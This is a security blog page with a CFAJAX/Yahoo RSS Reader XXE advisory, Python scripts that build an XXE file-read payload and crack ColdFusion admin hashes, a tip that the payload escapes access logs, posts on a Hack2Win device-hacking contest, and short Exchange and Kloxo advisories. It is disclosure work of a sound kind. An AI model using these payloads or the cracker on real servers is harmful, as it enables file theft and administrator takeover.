SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows an attacker to submit XML whose external entity declarations the server resolves (an XML External Entity, XXE, injection), disclosing files stored on the server. As the example below shows, that is enough to recover the ColdFusion administrator password hash and take over the administrator console. The vulnerability is present in several of the packages CFAJAX provides; below is an example of exploiting it in Yahoo RSS Reader. The issue is not specific to that software: any software built on CFAJAX is affected.

Unfortunately CFAJAX is no longer maintained (the last version was released on Nov 21st, 2005) and emails sent to the author go unanswered, but it is still deployed on several web sites we found on the Internet.

Technical Details
The vulnerability is exploited by sending the CFAJAX-based application an XML document that declares an external entity, which the application's XML parser resolves (XXE). This lets the attacker read files stored on the server; in our example these are neo-security.xml and password.properties, which together hold the ColdFusion administrator password hash and its salt. The hash can then be cracked offline (by brute force) to gain access to the ColdFusion administrator console.
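To show the mechanism the advisory relies on, here is an added example (not code from the advisory, from CFAJAX or from Yahoo RSS Reader) using Python's standard-library xml.sax parser: the same attacker-supplied document is parsed once with external entity resolution enabled, which is the vulnerable configuration, and once with it disabled. The file it reads is a constructed stand-in for neo-security.xml with no markup in it. The advisory's own exploit additionally uses an external DTD (cdata-xxe.dtd) so that the fetched file is wrapped in a CDATA section and files that themselves contain XML markup can be returned in-band; this simpler payload does not do that.

```python
"""Added example: XXE local-file read with Python's xml.sax, vulnerable
and hardened configuration side by side.  Not code from the advisory."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Parse attacker-controlled XML and return the text it produced.

    resolve_external_entities=True is the vulnerable setting: SYSTEM
    entities are fetched from disk (or the network) and substituted into
    the document.  False is the hardened setting (Python's default since
    3.7.1), under which the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_payload(path):
    """Classic in-band XXE: the entity body lands in the document text."""
    return (
        b'<?xml version="1.0"?>\n'
        b"<!DOCTYPE request [\n"
        b'  <!ENTITY xxe SYSTEM "' + path.encode() + b'">\n'
        b"]>\n"
        b"<request>&xxe;</request>\n"
    )


def demo():
    """Return (text from the vulnerable parse, text from the hardened parse)."""
    # Constructed stand-in for a sensitive server-side file.  The real
    # neo-security.xml is itself XML and would need the CDATA-wrapping DTD.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("admin.userid.root.salt=1361205427158\n")
        secret_path = fh.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_untrusted_xml(payload, resolve_external_entities=True)
        hardened = parse_untrusted_xml(payload, resolve_external_entities=False)
        return leaked, hardened
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked_text, hardened_text = demo()
    print("vulnerable parser returned:", repr(leaked_text))
    print("hardened parser returned:  ", repr(hardened_text))
```

The check a practitioner wants is the second result: with external general entities disabled the reference to the file silently expands to an empty string, so the fix for an application like the one in the advisory is a parser setting, not input filtering.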

Exploit
1. Send a single HTTP POST request to a vulnerable server. The exploit payload will not be logged, since by default only the requested URL is written to the access log, not the POST body.

2. Content of cf-92655311.xml listed below:

3. Content of cdata-xxe.dtd listed below:

4. You should receive a response like this:

5. Extract the salt and password values:

6. Now that you have the salt and the password hash, crack the password as follows:
Hash is the password variable from ./lib/password.properties.
Salt is the admin.userid.root.salt variable from ./lib/neo-security.xml.

Configuration file for John the Ripper:

7. Recover the password and log in to the administrator console (the /CFIDE URL).
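The extraction and cracking steps above, as an added example in Python rather than the John the Ripper configuration the advisory refers to (that configuration is not reproduced on this page). This is not the advisory's code. The password hashing scheme is an assumption: it follows what hashcat implements as its "ColdFusion 10+" mode (SHA-256 over the upper-case hex SHA-1 of the password followed by the salt); confirm it against the target's ColdFusion version before relying on it. The sample file contents, the WDDX layout around the admin.userid.root.salt variable, the salt value and the wordlist are all constructed for the example.

```python
"""Added example: recover the ColdFusion administrator password from the
salt and hash an XXE read returns.  The hash construction is an ASSUMPTION
(it matches hashcat's "ColdFusion 10+" mode); all sample data is constructed."""
import hashlib
import hmac
import re


def coldfusion10_hash(password: str, salt: str) -> str:
    """ASSUMED scheme: sha256(upper(hex(sha1(password))) + salt), upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return hashlib.sha256((inner + salt).encode("utf-8")).hexdigest().upper()


def extract_hash(password_properties: str) -> str:
    """password.properties is a Java properties file; take the password= line."""
    for line in password_properties.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "password":
            return value.strip()
    raise ValueError("no password= entry found")


def extract_salt(neo_security_xml: str) -> str:
    """Pull admin.userid.root.salt out of its WDDX <var> (surrounding layout assumed)."""
    match = re.search(
        r"<var name=['\"]admin\.userid\.root\.salt['\"]>\s*<string>([^<]+)</string>",
        neo_security_xml,
    )
    if not match:
        raise ValueError("no admin.userid.root.salt found")
    return match.group(1).strip()


def crack(target_hash: str, salt: str, candidates, hash_fn=coldfusion10_hash):
    """Offline dictionary attack.  Returns (password, attempts) or (None, attempts)."""
    target = target_hash.upper()
    attempts = 0
    for candidate in candidates:
        attempts += 1
        if hmac.compare_digest(hash_fn(candidate, salt), target):
            return candidate, attempts
    return None, attempts


def build_samples(password: str, salt: str):
    """Constructed stand-ins for the two files, hashed with the assumed scheme."""
    props = (
        "rdspassword=\n"
        "encrypted=true\n"
        "password=" + coldfusion10_hash(password, salt) + "\n"
    )
    neo = (
        "<wddxPacket version='1.0'><header/><data><struct>\n"
        "<var name='admin.userid.root.salt'><string>" + salt + "</string></var>\n"
        "</struct></data></wddxPacket>\n"
    )
    return props, neo


# Constructed wordlist; a real run would stream a large file instead.
WORDLIST = ["password", "admin", "coldfusion", "Summer2015", "Winter2015!", "letmein"]


def demo():
    """End to end: parse both files, then crack with the wordlist."""
    props, neo = build_samples("Winter2015!", "1361205427158")
    return crack(extract_hash(props), extract_salt(neo), WORDLIST)


if __name__ == "__main__":
    password, attempts = demo()
    print("recovered:", password, "after", attempts, "candidates")
```

Because the salt is per-installation, precomputed tables are useless here; the attack is a straight dictionary or brute-force run, which is why the advisory hands the pair to John the Ripper.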

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – 2nd Day and Summary

At the end of day 2 we had a total of 11 people taking part in the hacking contest, with about 30 people watching them hack live. Thank you all!

I'd like to especially mention the skilled security researchers from Korea, who were the ultimate winners of this contest, having found the most impressive vulnerability as selected by the judges.

As a group they were awarded 1st place and won the cash prize.

We are already thinking about next year's event. It might be fun to move from IP cameras to other consumer electronics. The IP cameras were not much of a challenge this year: 2 of the 3 were hacked, and the 3rd was totally 'bricked', not working even after a factory reset.

We will keep you posted on the vendors' reaction to these vulnerabilities, with updates on the fixes they release and, of course, additional information on the researchers' findings.

Until next year!

Hack2Win – 1st Day Update

Hi,

Thank you to everyone who participated; quite a few people tried their skills at hacking various networking and IoT devices. Of the 9 available devices, 2 were removed after they were completely owned, and another was removed because testing caused it to factory-reset and become unreachable (no IP address). The two owned devices were the ZyXEL Media Server and the D-Link DCS-5222L; the device that became unreachable was the Tenvis IPROBOT 3 (TZ100).

The ZyXEL Media Server, running firmware V4.70(AFK.1), currently has no publicly listed pre-authentication vulnerabilities, but at Hack2Win it was compromised to the point of root access on the box.

Likewise the D-Link DCS-5222L, running firmware 2.03.01, currently has no publicly listed pre-authentication vulnerabilities. The camera feed was obtained without any user credentials, and the participant was able to move the camera physically and make it emit annoying sounds.

Once the vulnerabilities are fixed by the vendors, we will publish full technical details for all of them.

The Tenvis IPROBOT 3 (TZ100) vulnerability that allows a factory reset is in the web interface. It can be triggered remotely and requires no authentication. Unfortunately for the participant, the device was no longer accessible, so the vulnerability could not be reproduced and could not be rated as more than a denial of service, which is not eligible in our contest.

The participant says the vulnerability is an exploitable buffer overflow in the device (Tenvis IPROBOT 3) that can be used to gain access to it. I am sure that tomorrow, after I have had a chance to reconfigure the device, they will be able to repeat the process and get it qualified for a prize, assuming it is more than a denial of service.

Hack2Win – a CodeBlue Conference Event (Update)

Hi,

Due to some issues importing WiFi equipment into Japan we had to remove the following products from our list of available targets:

  • ASUS RT-N16
  • TRENDNet TS-I300W
  • OM2P-HS 802.11gn
  • AXIS 0554-004 M1004-W
  • D-Link AC3200

If you have already found a vulnerability that you were planning to use during the event, don't be discouraged: it is very likely that we can compensate you by buying it through our vulnerability purchasing program, SecuriTeam Secure Disclosure (SSD). Email me at ssd[@]beyondsecurity.com with the details and we will handle it through that program.

We have added to the contest the following items instead:

  • TRENDnet HD Wireless Day, Night PTZ Cloud Camera, TV-IP862IC (White)
  • TRENDnet 2-Bay NAS (1 x 1TB) Media Server Enclosure (TN-200T1)
  • TENVIS TZ100 H.264 720P HD P2P Pan & Tilt Wireless IP/Network Camera with Two-Way Audio and Night Vision (Black)

If you have any questions or comments, please email me at ssd[@]beyondsecurity.com.

SSD Advisory – Microsoft Exchange Server Information Disclosure Proof of Concept (MS15-103)

Introduction
A security vulnerability in Microsoft Exchange has been discovered that causes the server to return cookie information inside the HTML response body.

This allows an attacker to use JavaScript to read the otherwise inaccessible cookie values and use them to log in to an active Exchange Server OWA (Outlook Web App) webmail session.

Information about how to fix this vulnerability has been disclosed in Microsoft's bulletin:
Vulnerabilities in Microsoft Exchange Server Could Allow Information Disclosure (3089250)

However, until now we have not seen any technical description of the vulnerability, or of how to verify whether you are vulnerable other than by checking whether the patch is installed.

We believe, though we cannot be 100% sure, that this vulnerability is the one addressed by Microsoft's patch for CVE-2015-2505.

We were in the process of purchasing this vulnerability for our SecuriTeam Secure Disclosure program when Microsoft's bulletin came out, so we decided to release the information after giving Microsoft's customers a grace period to deploy the patch.

Hack2Win – a CodeBlue Conference Event (Japanese)

Hi everyone, and thank you, Kentaro, for the translation.

(Please note there is an update for this event here: https://blogs.securiteam.com/index.php/archives/2653)

An English version is available here: https://blogs.securiteam.com/index.php/archives/2626

At this year's Code Blue we wanted to offer not only sponsorship but also a new challenge. (We think it is a new challenge both for us and for the conference attendees.)

We plan to bring 11 devices to this year's venue and let everyone try whether they can hack them.

We tried to prepare a variety of devices for this challenge; each device costs around $200, so you can easily buy one and experiment with it before the event.

The target devices for this challenge are:

Hack2Win – a CodeBlue Conference Event

Hi everyone,

(Please note there is an update for this event here: https://blogs.securiteam.com/index.php/archives/2653)

A Japanese version is available here: https://blogs.securiteam.com/index.php/archives/2630

We have decided this year not only to sponsor CodeBlue, but also to try something new (for us and, I believe, for the conference's attendees).

We will be bringing 11 devices to the conference premises and allowing people to try their skills at hacking them.

We looked far and wide for different devices, all around the US$200 mark, so that they won't be expensive for you to buy and try out before the event.

SSD Advisory – Kloxo Sensitive Information Disclosure

Introduction
Kloxo (formerly known as Lxadmin) is a free, open-source web hosting control panel for the Red Hat and CentOS Linux distributions.

Vulnerability Details
Kloxo contains a vulnerability that allows an authenticated remote attacker (any client or auxiliary account) to read almost any information from the database, for example the passwords of other users (including administrators) and the credentials for the database connection. After obtaining the credentials of the user (reseller or admin) who created the current client, it is possible to assign the "admin" role to the current client.

Authentication is required to exploit this vulnerability, but any unprivileged client or auxiliary account suffices. As a result, any unprivileged user can log in as administrator and manage the system, execute arbitrary OS commands, or upload a PHP file and execute arbitrary PHP code (these are 'legitimate' features available to an administrator).
